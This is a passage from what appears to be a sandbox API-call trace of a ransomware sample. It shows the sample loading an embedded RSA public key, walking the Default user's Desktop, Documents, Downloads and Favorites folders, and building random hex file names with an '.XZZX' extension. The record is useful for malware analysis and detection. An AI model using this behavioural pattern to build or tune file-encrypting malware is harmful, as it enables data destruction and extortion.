pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc6ee5703, Data2=0xfbcb, Data3=0x40eb, Data4=([0]=0xae, [1]=0xe, [2]=0x12, [3]=0xec, [4]=0xdb, [5]=0x4f, [6]=0x14, [7]=0x6d))) returned 0x0 [0202.692] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini") returned 40 [0202.692] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.692] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Desktop\\6E4EF0613FD9E359C6EE570342A4C7A1.XZZX") returned 66 [0202.692] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0202.692] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini", dwFileAttributes=0x20) returned 0 [0202.692] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Desktop\\desktop.ini" (normalized: "c:\\users\\default\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 791 os_tid = 0xef8 [0202.841] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0202.841] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.841] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Documents\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\") returned="\\\\?\\C:\\Users\\Default\\Documents\\" [0202.841] SetErrorMode (uMode=0x1) returned 0x1 [0202.841] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0202.841] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x3d87e2d9, Data2=0xd09b, Data3=0x45e0, Data4=([0]=0x92, [1]=0x1, [2]=0xab, [3]=0x81, [4]=0xc0, [5]=0x99, [6]=0xc, [7]=0xb1))) returned 0x0 [0202.841] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini") returned 42 [0202.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0202.841] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Documents\\A996A96338F04EA03D87E2D93BBB32E8.XZZX") returned 68 [0202.841] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0202.841] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini", dwFileAttributes=0x20) returned 0 [0202.841] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Documents\\desktop.ini" (normalized: "c:\\users\\default\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 792 os_tid = 0xefc [0203.006] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.006] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.006] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\") returned="\\\\?\\C:\\Users\\Default\\Downloads\\" [0203.006] SetErrorMode (uMode=0x1) returned 0x1 [0203.006] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.006] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xb2f65f85, Data2=0x664b, Data3=0x434d, Data4=([0]=0x9c, [1]=0x9a, [2]=0x83, [3]=0x43, [4]=0xf6, [5]=0xd1, [6]=0x1c, [7]=0x2))) returned 0x0 [0203.006] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini") returned 42 [0203.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.006] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Downloads\\983CF9F71AE4658FB2F65F851DAF49D7.XZZX") returned 68 [0203.006] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0203.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini", dwFileAttributes=0x20) returned 0 [0203.006] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Downloads\\desktop.ini" (normalized: "c:\\users\\default\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 793 os_tid = 0xf00 [0203.153] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.153] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.153] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\" [0203.153] SetErrorMode (uMode=0x1) returned 0x1 [0203.153] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.153] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x22e552c1, Data2=0xba11, Data3=0x435c, Data4=([0]=0x88, [1]=0x56, [2]=0x9d, [3]=0x96, [4]=0x1c, [5]=0xdd, [6]=0x54, [7]=0x5))) returned 0x0 [0203.153] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini") returned 42 [0203.153] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.153] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\EF5AB8D130F5511C22E552C133C03564.XZZX") returned 68 [0203.153] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0203.153] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini", dwFileAttributes=0x20) returned 0 [0203.153] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 794 os_tid = 0xf04 [0203.308] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.308] lstrcpyW (in: lpString1=0x2caf460, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.308] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0203.308] SetErrorMode (uMode=0x1) returned 0x1 [0203.308] lstrcpyW (in: lpString1=0x2caf860, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0203.308] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xaedba32e, Data2=0xb93a, Data3=0x4e21, Data4=([0]=0xad, [1]=0x46, [2]=0x6e, [3]=0xe1, [4]=0xf9, [5]=0x5f, [6]=0xaf, [7]=0x16))) returned 0x0 [0203.308] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini") returned 48 [0203.308] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.308] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\56AF366C38878C7AAEDBA32E3B5270C2.XZZX") returned 74 [0203.308] StrStrW (lpFirst="desktop.ini", lpSrch="XZZX") returned 0x0 [0203.308] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini", dwFileAttributes=0x20) returned 0 [0203.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\desktop.ini" (normalized: "c:\\users\\default\\favorites\\links\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 795 os_tid = 0xf08 [0203.462] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.462] lstrcpyW (in: lpString1=0x2caf460, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0203.462] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\" [0203.462] SetErrorMode (uMode=0x1) returned 0x1 [0203.462] lstrcpyW (in: lpString1=0x2caf860, lpString2="Web Slice Gallery.url" | out: lpString1="Web Slice Gallery.url") returned="Web Slice Gallery.url" [0203.462] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x3f4d7ac0, Data2=0xcf03, Data3=0x45af, Data4=([0]=0x92, [1]=0xf1, [2]=0x43, [3]=0x5b, [4]=0xd1, [5]=0x71, [6]=0x5c, [7]=0x25))) returned 0x0 [0203.462] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url") returned 58 [0203.462] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.463] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\6429B0403859520D3F4D7AC03B243655.XZZX") returned 74 [0203.463] StrStrW (lpFirst="Web Slice Gallery.url", lpSrch="XZZX") returned 0x0 [0203.463] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url", dwFileAttributes=0x20) returned 0 [0203.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\default\\favorites\\links\\web slice gallery.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 796 os_tid = 0xf0c [0203.621] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.622] lstrcpyW (in: lpString1=0x2caf460, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0203.622] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.622] SetErrorMode (uMode=0x1) returned 0x1 [0203.622] lstrcpyW (in: lpString1=0x2caf860, lpString2="IE Add-on site.url" | out: lpString1="IE Add-on site.url") returned="IE Add-on site.url" [0203.622] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xaddf90fe, Data2=0x31b7, Data3=0x48f0, Data4=([0]=0x91, [1]=0x7c, [2]=0xc8, [3]=0x58, [4]=0x81, [5]=0x38, [6]=0x34, [7]=0x2b))) returned 0x0 [0203.622] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 68 [0203.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.622] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\159143920E2A1390ADDF90FE10F4F7D8.XZZX") returned 87 [0203.622] StrStrW (lpFirst="IE Add-on site.url", lpSrch="XZZX") returned 0x0 [0203.622] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url", dwFileAttributes=0x20) returned 0 [0203.622] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 797 os_tid = 0xf10 [0203.774] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.775] lstrcpyW (in: lpString1=0x2caf460, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0203.775] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.775] SetErrorMode (uMode=0x1) returned 0x1 [0203.775] lstrcpyW (in: lpString1=0x2caf860, lpString2="IE site on Microsoft.com.url" | out: lpString1="IE site on Microsoft.com.url") returned="IE site on Microsoft.com.url" [0203.775] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0x4760815, Data2=0x9c8e, Data3=0x4c50, Data4=([0]=0xa4, [1]=0x46, [2]=0xf9, [3]=0xd9, [4]=0xa0, [5]=0xd, [6]=0x83, [7]=0xfd))) returned 0x0 [0203.775] wsprintfW (in: param_1=0x2caec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned 78 [0203.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2cafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0203.775] wsprintfW (in: param_1=0x2cae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\666547A62EAB1460047608153175F8A8.XZZX") returned 87 [0203.775] StrStrW (lpFirst="IE site on Microsoft.com.url", lpSrch="XZZX") returned 0x0 [0203.775] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url", dwFileAttributes=0x20) returned 0 [0203.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff Thread: id = 798 os_tid = 0xf14 [0203.929] lstrcpyA (in: lpString1=0x2cafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0203.929] lstrcpyW (in: lpString1=0x2caf460, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0203.930] lstrcpyW (in: lpString1=0x2cae860, lpString2="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="\\\\?\\C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0203.930] SetErrorMode (uMode=0x1) returned 0x1 [0203.930] lstrcpyW (in: lpString1=0x2caf860, lpString2="Microsoft At Home.url" | out: lpString1="Microsoft At Home.url") returned="Microsoft At Home.url" [0203.930] CoCreateGuid (in: pguid=0x2cae440 | out: pguid=0x2cae440*(Data1=0xc35f5af6, Data2=0x808e, Data3=0x42ef, Data4=([0]=0xa3, [1]=0xef, [2]=0x6a, [3]=0x47, 